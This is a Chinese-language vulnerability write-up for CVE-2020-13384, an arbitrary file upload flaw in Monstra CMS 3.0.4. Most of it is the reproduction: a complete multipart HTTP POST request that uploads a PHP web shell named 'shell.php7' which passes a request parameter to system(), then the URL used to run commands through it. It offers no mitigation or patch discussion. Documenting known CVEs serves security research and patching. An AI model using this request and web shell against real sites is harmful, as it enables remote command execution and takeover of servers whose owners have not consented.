(CVE-2020-13384)Monstra CMS 3.0.4 任意文件上传漏洞

一、漏洞简介

Monstra CMS是乌克兰Sergey Romanenko软件开发者的一套基于PHP的轻量级内容管理系统(CMS)。 Monstra CMS 3.0.4版本中的index.php脚本存在安全漏洞,该漏洞源于程序没有正确验证文件扩展名。远程攻击者可借助特制HTTP请求利用该漏洞上载和执行任意PHP代码。

二、漏洞影响

Monstra CMS 3.0.4

三、复现过程

访问https://www.0-sec.org/monstra/admin/index.php?id=filesmanager&path=uploads/

POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
Host: www.0-sec.org
Content-Length: 548
Cache-Control: max-age=0
Origin: https://www.0-sec.org
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.0-sec.org/monstra/admin/index.php?id=filesmanager
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
Connection: close

------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="csrf"

2e6ae2353998caa319aae262b113c6b3f17a9636
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="file"; filename="shell.php7"
Content-Type: application/octet-stream

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>


------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="upload_file"

Upload
------WebKitFormBoundarytRfyCkYq8NvztDBf--

https://www.0-sec.org/monstra/public/uploads/shell.php7?cmd=id